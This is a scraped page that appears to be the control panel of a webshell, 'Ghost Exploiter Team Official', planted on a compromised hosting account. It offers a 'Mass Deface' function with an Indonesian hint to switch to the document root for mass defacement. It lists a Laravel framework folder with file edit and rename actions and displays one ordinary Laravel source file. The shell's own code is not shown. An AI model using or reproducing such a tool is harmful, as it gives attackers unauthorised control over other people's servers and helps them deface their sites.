webshell
Ghost Exploiter Team Official
Mass Deface
Directory >>
/
home
/
whitjouh
/
public_html
/
core
/
vendor
/
laravel
/
framework
/
src
/
Illuminate
/
Support
/
Traits
/
Mass Deface Auto Detect Domain
/*Ubah Ke document_root untuk mass deface*/
File / Folder
Size
Action
.
-
+New File
CapsuleManagerTrait.php
1.397KB
edt
ren
ForwardsCalls.php
1.829KB
edt
ren
Localizable.php
0.614KB
edt
ren
ReflectsClosures.php
2.467KB
edt
ren
Tappable.php
0.347KB
edt
ren
<?php namespace Illuminate\Support\Traits; trait Tappable { /** * Call the given Closure with this instance then return the instance. * * @param callable|null $callback * @return $this|\Illuminate\Support\HigherOrderTapProxy */ public function tap($callback = null) { return tap($this, $callback); } }